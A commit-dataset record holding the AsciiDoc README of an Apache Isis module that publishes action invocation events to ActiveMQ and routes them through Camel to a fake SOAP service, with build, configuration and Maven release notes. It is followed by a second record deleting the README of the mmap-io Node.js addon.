.\/\n\nimage:https:\/\/travis-ci.org\/isisaddons\/isis-module-publishmq.png?branch=master[Build Status,link=https:\/\/travis-ci.org\/isisaddons\/isis-module-publishmq]\n\nThis module, intended for use with http:\/\/isis.apache.org[Apache Isis], provides an implementation of Apache Isis' link:http:\/\/isis.apache.org\/guides\/rg.html#_rg_services-spi_manpage-PublishingService[`PublishingService`] SPI that submits an XML representation of each link:https:\/\/github.com\/apache\/isis\/blob\/master\/core\/schema\/src\/main\/resources\/org\/apache\/isis\/schema\/aim\/aim-1.0.xsd[`ActionInvocationMemento`] to an link:http:\/\/activemq.apache.org[ActiveMQ] queue.\n\nThe example app itself also demonstrates how this action invocation event can be routed using link:http:\/\/camel.apache.org[Apache Camel]:\n\n* the payload is enriched using Apache Isis' own link:http:\/\/isis.apache.org\/guides\/ug.html#_ug_restfulobjects-viewer[Restful Objects] viewer (obtaining additional information).\n* the enriched message is used to post to a (fake) external SOAP service, eg representing a General Ledger.\n\nIn addition, the example app configures link:https:\/\/jolokia.org\/[Jolokia], allowing the ActiveMQ, Camel and other JMX beans to be administered from an external console such as link:hawt.io[Hawt.io].\n\nThe diagram below shows the moving parts:\n\nimage::webapp\/src\/main\/webapp\/images\/overview.png[link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/webapp\/src\/main\/webapp\/images\/overview.png\"]\n\n\nOne of the design objectives for the PublishMq module is to allow the ActiveMQ queue (and therefore any Camel routing) to be either embedded (as in the example app) or to be remote. 
This is one of the reasons why the payload posted to the queue is the XML representation of a JAXB object (the `ActionInvocationMemento`).\n\nTo make the example app easier to run, the fake SOAP service representing the external system is actually deployed as a CXF servlet within the example app itself, mounted at `\/soap\/ExternalSystemAdapter\/DemoObject`. It exposes an API for the Camel routing to post to, and also exposes a query API that simply lists the messages received. Of course, \"in real life\" this external system would be running somewhere else on the network (as the diagram shows).\n\n\n\n\n== Application walk-through\n\nThe following screenshots show how the publishing service publishes the action invocation event that is then routed through to the (fake) external system using Camel:\n\n=== Installing the Fixture Data\n\nFirst, install sample data:\n\nimage::images\/010-install-fixtures.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/010-install-fixtures.png\"]\n\nThis returns the first demo object (an instance of `PublishMqDemoObject`):\n\nimage::images\/020-update-demo-object.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/020-update-demo-object.png\"]\n\n=== Invoke an action\n\nThe `updateName()` action is defined as:\n\n[source,java]\n----\n@Action(\n semantics = SemanticsOf.IDEMPOTENT,\n publishing = Publishing.ENABLED \/\/ <1>\n)\npublic PublishMqDemoObject updateName(\n @ParameterLayout(named=\"Name\") final String name) {\n setName(name);\n return this;\n}\n----\n<1> invocations of this action will be published to the configured implementation of `PublishingService`.\n\n\nInvoke the action:\n\nimage::images\/030-update-demo-object.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/030-update-demo-object.png\"]\n\nthe value of the `name` property should, of course, be updated:\n\nimage::images\/040-demo-object-updated.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/040-demo-object-updated.png\"]\n\n\n=== Camel routing\n\nThe example app defines the following Camel route (link:fixture\/routing\/src\/main\/resources\/camel-config.xml[camel-config.xml]):\n\n[source,xml]\n----\n<camelContext xmlns=\"http:\/\/camel.apache.org\/schema\/spring\">\n <route id=\"updateFakeSoapServiceRoute\">\n <from uri=\"activemq-broker:queue:memberInteractionsQueue\"\/> <!-- 1 -->\n <unmarshal>\n <jaxb contextPath=\"org.apache.isis.schema.ixn.v1\" prettyPrint=\"true\"\/> <!-- 2 -->\n <\/unmarshal>\n <camel:process ref=\"addExchangeHeaders\"\/> <!-- 3 -->\n <camel:choice>\n <camel:when> <!-- 4 -->\n <camel:simple> <!-- 5 -->\n ${header.ixn[execution$memberIdentifier]} ==\n 'org.isisaddons.module.publishmq.fixture.dom.PublishMqDemoObject#updateName()'\n <\/camel:simple>\n <log message=\"updateName() received... \"\/>\n <camel:process ref=\"attachDomCanonicalDtoUsingRestfulObjects\"\/> <!-- 6 -->\n <camel:process ref=\"postToFakeExternalSoapService\"\/> <!-- 7 -->\n <log message=\"internalId: ${header.externalSystemInternalId}\"\/> <!-- 8 -->\n <camel:to uri=\"stream:out\"\/> <!-- 9 -->\n <\/camel:when>\n <camel:when>\n ...\n <\/camel:when>\n <\/camel:choice>\n <\/route>\n<\/camelContext>\n----\n<1> subscribe to ActiveMQ for incoming action invocation events (in XML form). 
This uses the internal `vm:\/\/` protocol for speed\n<2> unmarshal to a (JAXB annotated) `InteractionDto` object\n<3> using the `AddExchangeHeaders` component provided by this module to add the metadata from the `InteractionDto` to the Camel message. This allows the message to be routed\n<4> use Camel to select which sub-route to follow, using...\n<5> ... the header attached earlier. The action identifier header is usually used as the predicate for selecting the sub-route\n<6> Use a processor (implemented in the example app) to attach a DTO obtained from a call to Restful Objects.\n<7> Use a processor (implemented in the example app) to post a message to the fake external SOAP service.\n<8> Log the id allocated by the fake server to the console. This will increment for each call\n<9> Log the message payload to the console. Note that this does not include any attachments\n\nThe referenced beans are defined as:\n\n[source,xml]\n----\n<bean id=\"activemq-broker\"\n class=\"org.apache.activemq.camel.component.ActiveMQComponent\">\n <property name=\"brokerURL\" value=\"vm:\/\/broker?create=false&amp;waitForStart=5000\"\/>\n<\/bean>\n<bean id=\"addExchangeHeaders\"\n class=\"org.isisaddons.module.publishmq.dom.camel.AddExchangeHeaders\"\/> <!--1-->\n<bean id=\"attachDomCanonicalDtoUsingRestfulObjects\"\n class=\"org.isisaddons.module.publishmq.fixture.routing.AttachDemoObjectDto\"\n init-method=\"init\"> <!--2-->\n <property name=\"base\" value=\"${attachDomCanonicalDto.base}\"\/>\n <property name=\"username\" value=\"${attachDomCanonicalDto.username}\"\/>\n <property name=\"password\" value=\"${attachDomCanonicalDto.password}\"\/>\n<\/bean>\n<bean id=\"postToFakeExternalSoapService\"\n class=\"org.isisaddons.module.publishmq.fixture.routing.PostToExternalWebServiceUsingSoap\"\n init-method=\"init\"> <!--3-->\n <property name=\"endpointAddressBase\"\n value=\"${updateExternalSystemAdapter.endpointAddressBase}\"\/>\n <property name=\"endpointAddressSuffix\"\n value=\"${updateExternalSystemAdapter.endpointAddressSuffix}\"\/>\n<\/bean>\n----\n<1> adds the exchange headers for routing (step 3 in the route, above)\n<2> calls Restful Objects to obtain a DTO representing the updated entity (step 6 in the route)\n<3> calls the fake SOAP service (step 7 in the route)\n\nThere are two observable side-effects from the execution of this route. First, when the fake SOAP service is\ncalled, it should return an internal Id. This, along with the rest of the message payload, is logged to the console:\n\nimage::images\/050-camel-route-logging.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/050-camel-route-logging.png\"]\n\nThe screenshot also highlights the two important pieces of information used by the route: the member identifier metadata -- added as a Camel header for routing -- and the target object that was updated.\n\nSecond, we can query the fake SOAP service to see the data that was posted to it. 
The screenshot below uses link:http:\/\/www.soapui.org\/[SOAP UI], which can generate stub requests from the fake SOAP service's WSDL (http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject?wsdl[http:\/\/localhost:8080\/soap\/ExternalSystemAdapter\/DemoObject?wsdl]):\n\nimage::images\/060-query-fake-server.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/060-query-fake-server.png\"]\n\n[WARNING]\n====\nThe above screenshot is out-of-date, showing the format of the aim.xsd for 1.12.x, rather than ixn.xsd for 1.13.x\n====\n\n\n=== Proxying the REST and SOAP calls\n\nTo see in a little more detail what the `attachDomCanonicalDtoUsingRestfulObjects` and `postToFakeExternalSoapService` processors actually do, we can use the venerable link:http:\/\/ws.apache.org\/tcpmon\/download.cgi[tcpmon] to act as a proxy. For example, we can set up port 6060 to forward onto port 8080:\n\nimage::images\/110-proxy-restful-objects.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/110-proxy-restful-objects.png\"]\n\nWe can do the same for port 7070, also forwarding onto port 8080.\n\nThen, we can reconfigure the app to use these different ports by editing link:webapp\/src\/main\/resources\/spring.properties[`spring.properties`]:\n\n[source,ini]\n----\nattachDomCanonicalDto.base=http:\/\/localhost:6060\/restful\/\nupdateExternalSystemAdapter.endpointAddressBase=http:\/\/localhost:7070\/soap\/\n...\n----\n\nWhen we run once more, we can see that the `attachDomCanonicalDtoUsingRestfulObjects` processor uses content negotiation (conneg) support to obtain a specific canonical DTO that represents the original `PublishMqDemoObject` entity:\n\nimage::images\/120-conneg.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/120-conneg.png\"]\n\nUsing DTOs in this way is important because we want the Camel event bus logic to be decoupled from changes to the\ninternals of the Apache Isis app. As the screenshot shows, the processor specifies an HTTP Accept header. 
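In outline, such a request might look like the following -- a hypothetical sketch, since the exact object URL and Accept header parameters depend on the app and on the configured content negotiation strategy:\n\n[source]\n----\nGET \/restful\/objects\/PUBLISHMQDEMOOBJECT\/0 HTTP\/1.1\nAccept: application\/xml;profile=\"urn:org.restfulobjects:repr-types\/object\";\n x-ro-domain-type=\"org.isisaddons.module.publishmq.fixture.canonical.DemoObjectDto\"\n----\n\n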
The\nRestful Objects viewer delegates to the configured\nlink:http:\/\/isis.apache.org\/guides\/rg.html#_rg_services-spi_manpage-ContentNegotiationService[`ContentNegotiationService`]\nSPI, which knows how to map the `PublishMqDemoObject` entity into the requested `DemoObjectDto` DTO:\n\n[source,java]\n----\n@DomainService(nature = NatureOfService.DOMAIN)\npublic class PublishMqDemoContentMappingService implements ContentMappingService {\n public Object map(\n final Object object,\n final List<MediaType> acceptableMediaTypes) {\n if(object instanceof PublishMqDemoObject) {\n final PublishMqDemoObject demoObject = (PublishMqDemoObject) object;\n final Bookmark bookmark = bookmarkService.bookmarkFor(object);\n final DemoObjectDto dto = new DemoObjectDto();\n dto.setName(demoObject.getName());\n dto.setDescription(demoObject.getDescription());\n final OidDto oidDto = bookmark.toOidDto();\n dto.setOid(oidDto);\n return dto;\n }\n return null;\n }\n @javax.inject.Inject\n private BookmarkService bookmarkService;\n}\n----\n\nThe call to the fake SOAP service, meanwhile, is more straightforward: we observe just the regular SOAP messages (the\nimplementation uses `wsdl2java` to create stubs, so there is very little hand-written code):\n\nimage::images\/210-proxy-soapservice.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/210-proxy-soapservice.png\"]\n\n=== Jolokia and Hawt.io\n\nAs mentioned in the introduction, the example app also configures Jolokia so that consoles such as Hawt.io can be used to monitor\/administer internal JMX beans (including ActiveMQ and Camel).\n\nConfiguring Jolokia itself turns out to be as simple as updating the classpath and adding its servlet to the `web.xml`:\n\n[source,xml]\n----\n<servlet>\n <servlet-name>jolokia-agent<\/servlet-name>\n <servlet-class>org.jolokia.http.AgentServlet<\/servlet-class>\n <init-param>\n <param-name>discoveryEnabled<\/param-name>\n <param-value>false<\/param-value>\n <\/init-param>\n <init-param>\n <param-name>agentDescription<\/param-name>\n <param-value>Apache ActiveMQ<\/param-value>\n <\/init-param>\n <load-on-startup>1<\/load-on-startup>\n<\/servlet>\n<servlet-mapping>\n <servlet-name>jolokia-agent<\/servlet-name>\n <!-- using same convention as standalone ActiveMQ -->\n <url-pattern>\/api\/jolokia\/*<\/url-pattern>\n<\/servlet-mapping>\n----\n\nWith this done, we can use Hawt.io to connect to the service:\n\nimage::images\/310-connect-activemq.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/310-connect-activemq.png\"]\n\nHawt.io itself runs as a separate webapp. 
For testing purposes, it can also be run from the command line, eg:\n\n[source,bash]\n----\njava -jar hawtio-app-1.4.51.jar --port 9090\n----\n\n\n=== Monitoring ActiveMQ and Camel\n\nOnce connected we can navigate to the ActiveMQ tab:\n\nimage::images\/320-monitor-activemq.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/320-monitor-activemq.png\"]\n\nand similarly to the Camel tab:\n\nimage::images\/330-monitor-camel.png[width=800,height=469,link=\"https:\/\/raw.githubusercontent.com\/isisaddons\/isis-module-publishmq\/master\/images\/330-monitor-camel.png\"]\n\n\n\n\n== How to run the Demo App\n\nThe prerequisite software is:\n\n* Java JDK 7 (nb: Isis currently does not support JDK 8)\n* http:\/\/maven.apache.org[maven 3] (3.2.x or later is recommended).\n\nTo build the demo app:\n\n[source]\n----\ngit clone https:\/\/github.com\/isisaddons\/isis-module-publishmq.git\nmvn clean install\n----\n\nTo run the demo app:\n\n[source]\n----\nmvn antrun:run -P self-host\n----\n\nThen log on using user: `sven`, password: `pass`.\n\n\nIf you want to proxy the Restful Objects and\/or fake SOAP servers, then update `spring.properties` and run `tcpmon` or similar (as shown in the app walkthrough, above).\n\nHawt.io is a standalone utility that is _not_ integrated into the example webapp; if you want to run it then specify `--port` so that it runs on some port other than its default, 8080.\n\n\n\n\n\n== How to configure\/use\n\nYou can either use this module \"out-of-the-box\", or you can fork this repo and extend it to your own requirements.\n\nThe module itself consists of submodules:\n\n* `dom-servicespi`, containing the `PublishingService` SPI implementation\n* `dom-camel`, which provides a utility class to help route messages\n* `dom`, the parent module\n\n\n\n=== \"Out-of-the-box\"\n\nTo use \"out-of-the-box\":\n\n* update your classpath by importing the parent module's dependency into your parent module's `pom.xml`: +\n+\n[source,xml]\n----\n<dependencyManagement>\n <dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom<\/artifactId>\n <version>1.12.0<\/version>\n <type>pom<\/type>\n <scope>import<\/scope>\n <\/dependency>\n ...\n <\/dependencies>\n<\/dependencyManagement>\n----\n\n* if using `AppManifest`, then update its `getModules()` method: +\n+\n[source,java]\n----\n @Override\n public List<Class<?>> getModules() {\n return Arrays.asList(\n ...\n org.isisaddons.module.publishmq.PublishMqModule.class,\n ...\n );\n }\n----\n\n* otherwise, in your project's `webapp` module, update your `WEB-INF\/isis.properties`. 
+\n+\n[source,ini]\n----\n isis.services.ServicesInstallerFromAnnotation.packagePrefix=\\\n ...\\\n org.isisaddons.module.publishmq.dom,\\\n ...\n----\n+\nYou might also need to specify the package for any new services that you have written, eg an implementation of `ContentNegotiationService` or similar.\n\n* update your classpath by adding the `-dom-servicespi` dependency to your project's `dom` module's `pom.xml`: +\n+\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom-servicespi<\/artifactId>\n <\/dependency>\n ...\n<\/dependencies>\n----\n\n* if you are using Camel for routing and want to use the `AddExchangeHeaders` utility class, then -- in the appropriate module within your app -- add the dependency: +\n+\n[source,xml]\n----\n<dependencies>\n <dependency>\n <groupId>org.isisaddons.module.publishmq<\/groupId>\n <artifactId>isis-module-publishmq-dom-camel<\/artifactId>\n <\/dependency>\n ...\n<\/dependencies>\n----\n+\nIn the example app all the Camel routing can be found in the `-fixture-routing` module.\n\n\n* configure ActiveMQ so that the publishing service implementation can post to a queue called `memberInteractionsQueue`. +\n+\nIn the example app this is done using Spring (link:webapp\/src\/main\/resources\/activemq-config.xml[activemq-config.xml]):\n+\n[source,xml]\n----\n<beans\n xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n xmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n xsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans http:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n http:\/\/activemq.apache.org\/schema\/core http:\/\/activemq.apache.org\/schema\/core\/activemq-core.xsd\">\n <broker xmlns=\"http:\/\/activemq.apache.org\/schema\/core\"\n brokerName=\"broker\"\n dataDirectory=\"${activemq.data}\"\n useShutdownHook=\"false\"\n useJmx=\"true\"\n >\n ...\n <destinations>\n <queue physicalName=\"memberInteractionsQueue\"\/>\n <\/destinations>\n ...\n <\/broker>\n<\/beans>\n----\n+\nThis is bootstrapped in the `web.xml`:\n+\n[source,xml]\n----\n<listener>\n <listener-class>org.springframework.web.context.ContextLoaderListener<\/listener-class>\n<\/listener>\n<context-param>\n <param-name>contextConfigLocation<\/param-name>\n <param-value>\n classpath:activemq-config.xml\n <\/param-value>\n<\/context-param>\n----\n\nNotes:\n\n* Check for later releases by searching the http:\/\/search.maven.org\/#search|ga|1|isis-module-publishmq-dom[Maven Central Repo].\n\n\n==== \"Out-of-the-box\" (-SNAPSHOT)\n\nIf you want to use the current `-SNAPSHOT`, then the steps are the same as above, except:\n\n* when updating the classpath, specify the appropriate -SNAPSHOT version:\n\n[source,xml]\n----\n<version>1.13.0-SNAPSHOT<\/version>\n----\n\n* add the repository definition to pick up the most recent snapshot (we use the Cloudbees continuous integration service). 
We suggest defining the repository in a `<profile>`:\n\n[source,xml]\n----\n<profile>\n <id>cloudbees-snapshots<\/id>\n <activation>\n <activeByDefault>true<\/activeByDefault>\n <\/activation>\n <repositories>\n <repository>\n <id>snapshots-repo<\/id>\n <url>http:\/\/repository-estatio.forge.cloudbees.com\/snapshot\/<\/url>\n <releases>\n <enabled>false<\/enabled>\n <\/releases>\n <snapshots>\n <enabled>true<\/enabled>\n <\/snapshots>\n <\/repository>\n <\/repositories>\n<\/profile>\n----\n\n=== Forking the repo\n\nIf instead you want to extend this module's functionality, then we recommend that you fork this repo. The repo is\nstructured as follows:\n\n* `pom.xml` - parent pom\n* `dom` - the module implementation, itself a parent with submodules:\n** `dom-servicespi` - the implementation of `PublishingServiceUsingActiveMq`; depends on the Apache Isis applib\n** `dom-camel` - providing the `AddExchangeHeaders` utility for routing messages using Camel\n* `fixture` - fixtures, itself a parent with submodules:\n** `fixture-dom` - holding sample domain objects; depends on `dom-servicespi`\n** `fixture-scripts` - holding sample fixture (data) setup scripts\n** `fixture-canonical` - defines the canonical `DemoObjectDto`, as queried for using Restful Objects. This uses `xjc` to convert the XSD into the Java DTO.\n** `fixture-canonicalmappings` - contains the implementation of `ContentMappingService` to map the `PublishMqDemoObject` entity to the `DemoObjectDto` DTO\n** `fixture-routing` - contains the example Camel route\n* `externalsystemadapter` - parent module for the fake external system exposing a SOAP web service:\n** `externalsystemadapter-wsdl` - defines the WSDL for the fake SOAP service\n** `externalsystemadapter-wsdlgen` - generates the stub classes for both client and server\n** `externalsystemadapter-fakeserver` - implementation of the fake server (embedded in the example webapp for convenience\/testing)\n* `integtests` - (TODO) integration tests for the module; depends on `fixture-dom`\n* `webapp` - demo webapp (see above screenshots); depends on `dom` and `fixture`\n\nOnly the `dom` module (with its submodules) is released to Maven Central Repo. The versions of the other modules are purposely left at `0.0.1-SNAPSHOT` because they are not intended to be released.\n\n\n\n== Also of note\n\nThe example app contains a few other little tricks that may be useful if you are looking to deploy a similar architecture for your own application.\n\n=== Generate Canonical DTO referencing Apache Isis' DTOs\n\nAs of 1.9.0 Apache Isis includes the link:http:\/\/isis.apache.org\/schema\/aim\/aim.xsd[`aim.xsd`] (action invocation memento) and http:\/\/isis.apache.org\/schema\/common\/common.xsd[`common.xsd`] (common data types) schemas. The `PublishingServiceMq` uses the `aim.xsd` schema (or rather, its Java JAXB equivalent, `ActionInvocationMemento`) directly. The `common.xsd` schema is referenced by `aim.xsd` for its definition of bookmarks (oids) to objects.\n\nThe `common.xsd` is _also_ used by the example app in the construction of its own canonical `DemoObjectDto`, because it is `xs:import`'ed into the corresponding link:fixture\/canonical\/src\/main\/resources\/org\/isisaddons\/module\/publishmq\/fixture\/canonical\/demoobject.xsd[`demoobject.xsd`] schema (from which `DemoObjectDto` is generated). 
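In outline, that import looks something like the following -- a simplified sketch rather than the literal contents of `demoobject.xsd` (in particular, treat the namespace URIs as assumptions to be checked against the real schema files):\n\n[source,xml]\n----\n<xs:schema xmlns:xs=\"http:\/\/www.w3.org\/2001\/XMLSchema\"\n xmlns:com=\"http:\/\/isis.apache.org\/schema\/common\">\n <xs:import namespace=\"http:\/\/isis.apache.org\/schema\/common\"\n schemaLocation=\"http:\/\/isis.apache.org\/schema\/common\/common.xsd\"\/>\n <!-- element definitions for DemoObjectDto, referencing types such as com:oidDto -->\n<\/xs:schema>\n----\n\n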
A link:fixture\/canonical\/src\/main\/resources\/org\/isisaddons\/module\/publishmq\/fixture\/canonical\/demoobject-binding.xml[binding file] is used to ensure that classes for the imported `common.xsd` are not regenerated, and that the Java import statements refer to the correct package. This is all configured in the corresponding link:fixture\/canonical\/pom.xml#L65[`pom.xml`] file.\n\n\n=== Centralized Spring configuration\n\nIn the example app Spring is used to bootstrap ActiveMQ (link:webapp\/src\/main\/resources\/activemq-config.xml[`activemq-config.xml`]), Camel (link:fixture\/routing\/src\/main\/resources\/camel-config.xml[`camel-config.xml`]) and also the fake SOAP subscriber (link:webapp\/src\/main\/resources\/externalSystemFakeServer-config.xml[`externalSystemFakeServer-config.xml`]). The configuration for all of these is centralized through a `propertyPlaceholderConfigurer` bean (defined in link:webapp\/src\/main\/resources\/propertyPlaceholderConfigurer-config.xml#L23[`propertyPlaceholderConfigurer-config.xml`]).\n\nThe location of the property file is specified in the link:webapp\/src\/main\/webapp\/WEB-INF\/web.xml#L44[`web.xml`]:\n\n[source,xml]\n----\n<context-param>\n <param-name>spring.config.file<\/param-name>\n <param-value>classpath:spring.properties<\/param-value>\n<\/context-param>\n----\n\nwhere link:webapp\/src\/main\/resources\/spring.properties[`spring.properties`] is (using the same property names as are referenced from the bean definitions shown earlier):\n\n[source,ini]\n----\nactivemq.data=activemq-data\nattachDomCanonicalDto.base=http:\/\/localhost:8080\/restful\/\nattachDomCanonicalDto.username=sven\nattachDomCanonicalDto.password=pass\nupdateExternalSystemAdapter.endpointAddressBase=http:\/\/localhost:8080\/soap\/\nupdateExternalSystemAdapter.endpointAddressSuffix=ExternalSystemAdapter\/DemoObject\n----\n\nIf necessary the location of this config file can be overridden; see link:http:\/\/isis.apache.org\/guides\/ug.html#_ug_deployment_externalized-configuration[this topic] in the Apache Isis user guide.\n\n\n=== WSDL to Java\n\nSimilar to the way in which the .xsd schemas are converted to Java, `wsdl2java` is used to convert the fake server's WSDL to Java stubs. This WSDL can be found link:externalsystemadapter\/wsdl\/src\/main\/resources\/org\/isisaddons\/module\/publishmq\/externalsystemadapter\/wsdl\/DemoObject.wsdl[here]; the `pom.xml` configuration can be found link:https:\/\/github.com\/isisaddons\/isis-module-publishmq\/blob\/master\/externalsystemadapter\/wsdlgen\/pom.xml#L76[here].\n\n\n\n\n\n== Related Modules\/Services\n\nThe http:\/\/github.com\/isisaddons\/isis-module-publishing[Isis addons' publishing] module provides an alternative implementation of the `PublishingService` SPI that publishes to a database table.\n\n\n\n\n== Known issues\n\nNone at this time.\n\n\n\n== Change Log\n\n* `1.12.0` - released against Isis 1.12.0\n* `1.11.0` - released against Isis 1.11.0\n* `1.10.0` - released against Isis 1.10.0\n* `1.9.0` - released against Isis 1.9.0\n\n\n\n== Legal Stuff\n\n=== License\n\n[source]\n----\nCopyright 2015 Dan Haywood\n\nLicensed under the Apache License, Version 2.0 (the\n\"License\"); you may not use this file except in compliance\nwith the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing,\nsoftware distributed under the License is distributed on an\n\"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\nKIND, either express or implied. 
See the License for the\nspecific language governing permissions and limitations\nunder the License.\n----\n\n=== Dependencies\n\nThe module depends on link:http:\/\/activemq.apache.org[ActiveMQ] and also link:http:\/\/camel.apache.org[Camel]. The latter can be considered optional, because that dependency only provides a supporting utility class (`AddExchangeHeaders`).\n\n\n\n\n== Maven deploy notes\n\nOnly the `dom` module is deployed, and this is done using Sonatype's OSS support (see\nhttp:\/\/central.sonatype.org\/pages\/apache-maven.html[user guide]).\n\n=== Release to Sonatype's Snapshot Repo\n\nTo deploy a snapshot, use:\n\n[source]\n----\npushd dom\nmvn clean deploy\npopd\n----\n\nThe artifacts should be available in Sonatype's\nhttps:\/\/oss.sonatype.org\/content\/repositories\/snapshots[Snapshot Repo].\n\n\n\n=== Release to Maven Central\n\nThe `release.sh` script automates the release process. It performs the following:\n\n* performs a sanity check (`mvn clean install -o`) that everything builds ok\n* bumps the `pom.xml` to a specified release version, and tags the release\n* performs a double check (`mvn clean install -o`) that everything still builds ok\n* releases the code using `mvn clean deploy`\n* bumps the `pom.xml` to a specified snapshot version\n\nFor example:\n\n[source]\n----\nsh release.sh 1.13.0 \\\n 1.14.0-SNAPSHOT \\\n dan@haywood-associates.co.uk \\\n \"this is not really my passphrase\"\n----\n\nwhere:\n\n* `$1` is the release version\n* `$2` is the snapshot version\n* `$3` is the email of the secret key (`~\/.gnupg\/secring.gpg`) to use for signing\n* `$4` is the corresponding passphrase for that secret key.\n\nOther ways of specifying the key and passphrase are available; see the `pgp-maven-plugin`'s\nhttp:\/\/kohsuke.org\/pgp-maven-plugin\/secretkey.html[documentation].\n\nIf the script completes successfully, then push changes:\n\n[source]\n----\ngit push origin master\ngit push origin 1.13.0\n----\n\nIf the script fails to complete, then identify the cause, perform a `git reset --hard` to start over and fix the issue\nbefore trying again. Note that in the `dom`'s `pom.xml` the `nexus-staging-maven-plugin` has the\n`autoReleaseAfterClose` setting set to `true` (to automatically stage, close and then release the repo). You may want\nto set this to `false` if debugging an issue.\n\nAccording to Sonatype's guide, it takes about 10 minutes to sync, but up to 2 hours to update http:\/\/search.maven.org[search].","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"abdc39a7e0e2a009e88ffbc70fa80ef70cdc38db","subject":"rm README.adoc","message":"rm README.adoc\n","repos":"ozra\/mmap-io,ozra\/mmap-io,ozra\/mmap-io,ozra\/mmap-io,ozra\/mmap-io","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"https:\/\/travis-ci.org\/ozra\/mmap-io[image:https:\/\/travis-ci.org\/ozra\/mmap-io.svg?branch=master[Build\nStatus]]\n\n[[mmap-for-io.js-node.js]]\nMmap for Io.js \/ Node.js\n------------------------\n\nmmap(2) \/ madvise(2) \/ msync(2) for io.js \/ node.js revisited.\n\nI needed shared memory mapping and came across @bnoordhuis' module\nhttps:\/\/github.com\/bnoordhuis\/node-mmap[node-mmap], only to find that it\ndidn't work with later versions of io.js (and compatibles). 
So out of\nneed I threw this together along with the functionality I found was\nmissing in node-mmap: advise and sync.\n\nStrong temptations to re-order arguments to something more sane were kept\nat bay, and I kept it as in mmap(2) and node-mmap for compatibility.\nA notable difference is the additional optional argument to pass a usage\nadvice in the mapping stage. I've given advise and sync more practical\narguments, from an io.js perspective, than their C\/C++ counterparts.\n\nThe flag constants have the same crooked names as in C\/C++ to make it\nstraightforward for the user to google the net and relate to man-pages.\n\nThis is my first io.js addon and after hours wasted reading up on the V8 API\nI luckily stumbled upon https:\/\/github.com\/rvagg\/nan[Native Abstractions\nfor Node]. Makes life so much easier. Hot tip!\n\n_mmap-io_ is written in C++11 and\nhttps:\/\/github.com\/gkz\/LiveScript[LiveScript].\n\nIt should be noted that mem-mapping is by nature potentially blocking,\nand _should not be used in concurrent serving\/processing applications_,\nbut rather has its niche where multiple processes are working on the\nsame giant sets of data (thereby sparing physical memory, and load times\nif the kernel does its job of reading ahead), preferably with multiple readers\nand a single concurrent writer (or none), so as not to spoil the gains with\nshitloads of mutexes. And your noble specific use case, of course.\n\n[[news-and-updates]]\nNews and Updates\n----------------\n\n[[version-0.9.4]]\n2015-10-10: version 0.9.4\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\n* Compilation on Mac should work now. Thanks to @aeickhoff\n\n[[version-0.9.3]]\n2015-10-01: version 0.9.3\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\n* Windows compatibility added. Thanks to @toxicwolf\n* Rewrote the bindings to the Nan 2.0.9 API version (V8\/io\/Node hell...)\n** Had to remove the error _codes_ to get it working in the time I had\navailable (or rather - didn't have..) - error messages are still there -\nwith the code in the message instead. Though, usually nothing goes wrong, so\nonly the test cares ;-)\n* Added some helpful targets in the Makefile: `human_errors`, `ls` only,\n`build` only, etc. (useful if you wanna hack the module)\n* Since all the _functionality_ that can possibly be in place is in place, I\nbumped all the way to 0.8. Not battle tested enough to warrant higher.\n* Commented away experimental async read-ahead caching when the readahead\nhint was on. It hasn't broken, but it's an unnecessary risk. Plays safe.\nYou can toy with it yourself if you want to try to milk out some _ms_ of\nperformance.\n\n[[version-0.1.3]]\n2015-03-04: version 0.1.3\n^^^^^^^^^^^^^^^^^^^^^^^^^\n\n* This is the first public commit, and the code has one day of\ndevelopment put into it as of now. 
